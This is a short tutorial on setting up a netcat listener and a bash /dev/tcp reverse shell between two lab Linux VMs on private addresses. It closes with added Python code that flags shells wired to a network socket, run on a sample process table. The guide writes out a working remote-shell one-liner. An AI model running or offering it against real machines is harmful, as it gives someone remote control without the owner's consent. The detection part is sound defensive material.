In this guide we are going to show you how to build a reverse shell between two Linux machines.
For this purpose we will use two VMs running Linux: one running Kali Linux and the other running Backtrack Linux.
- Kali Linux machine IP: 192.168.179.137
- Backtrack Linux machine IP: 192.168.179.139
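What is a reverse shell
Usually, when a TCP/IP connection is made between two computers, one of them acts as the server and handles the connection, and the other, the so-called client, tries to make the connection. In a reverse shell these roles are swapped: the machine that will be controlled makes the outbound connection to the machine that will control it.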
Where you can use a reverse shell
Suppose you want to help a friend, but he does not have a server with port forwarding, etc., so of course you cannot connect to his machine. In this case you can use a reverse shell to receive a reverse TCP/IP connection from your friend's machine, with full administrator access.
Do not think of doing anything illegal; I do not want any bullshit.
Now we are going to use Netcat on the server side, that is, on the BT machine. Netcat is a free network utility used to read from and write to TCP and UDP sockets.
Step 1: Your first step is to put your machine into listening mode using the following command:
Command: nc -l -vv -p 1337
Here, -l means listen mode, -vv means verbose mode, and -p specifies the port used for the server.
Once you run the command on your machine (BT), you should see the following:
Step 2: Now go to the client machine, i.e. the Kali Linux machine that you want to control from your terminal. Here we are going to redirect the standard input, output and error of bash on the client to the server using the following bash command:
Command: bash -i &> /dev/tcp/192.168.179.139/1337 0>&1
Here, bash -i starts an interactive bash, &> /dev/tcp/192.168.179.139/1337 redirects bash's standard output and standard error to the server, and 0>&1 connects bash's standard input to the same connection as the output.
Here both machines are connected to the same network via NAT, so we will use our local IP.
Once you or your friend executes the above command on the client machine, you will be connected to it and you will be able to fully control it through the shell terminal.
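Seen from the defender's side, the redirection in Step 2 leaves a clear trace: the bash process ends up with file descriptors 0, 1 and 2 all pointing at one TCP socket instead of a terminal. The following is an added example, not part of the original guide, that checks for this; the function names, the list of shell names and the sample process table are assumptions made for illustration.

```python
import os
import re

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}      # assumed list of shell names
SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")      # form of a /proc/<pid>/fd link to a socket

def std_fds_on_one_socket(fd_targets):
    """fd_targets maps fd number -> link target of /proc/<pid>/fd/<n>.
    Return the socket inode if fds 0, 1 and 2 share one socket, else None."""
    inodes = set()
    for fd in (0, 1, 2):
        m = SOCKET_RE.match(fd_targets.get(fd, ""))
        if not m:
            return None
        inodes.add(m.group(1))
    return inodes.pop() if len(inodes) == 1 else None

def suspicious(procs):
    """procs yields (pid, comm, fd_targets); return shells wired to a single socket."""
    hits = []
    for pid, comm, fds in procs:
        inode = std_fds_on_one_socket(fds)
        if comm in SHELLS and inode is not None:
            hits.append((pid, comm, inode))
    return hits

def read_proc(root="/proc"):
    """Collect (pid, comm, fd_targets) from a live Linux system, skipping unreadable entries."""
    for entry in os.listdir(root):
        if not entry.isdigit():
            continue
        try:
            with open(f"{root}/{entry}/comm") as f:
                comm = f.read().strip()
            fds = {n: os.readlink(f"{root}/{entry}/fd/{n}") for n in (0, 1, 2)}
        except OSError:            # process exited, or not ours to inspect
            continue
        yield int(entry), comm, fds

# Constructed sample process table (not captured from a real host).
SAMPLE = [
    (2101, "bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),      # terminal shell
    (2188, "bash", {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}),
    (950, "rsync", {0: "socket:[30110]", 1: "socket:[30110]", 2: "socket:[30110]"}),
    (2301, "bash", {0: "pipe:[5001]", 1: "pipe:[5002]", 2: "/dev/pts/1"}),    # shell in a pipeline
]

if __name__ == "__main__":
    print("sample:", suspicious(SAMPLE))
    if os.path.isdir("/proc"):
        print("live:", suspicious(read_proc()))
```

A hit is a lead for triage rather than proof, since shells started by inetd-style services also have their standard descriptors on a socket.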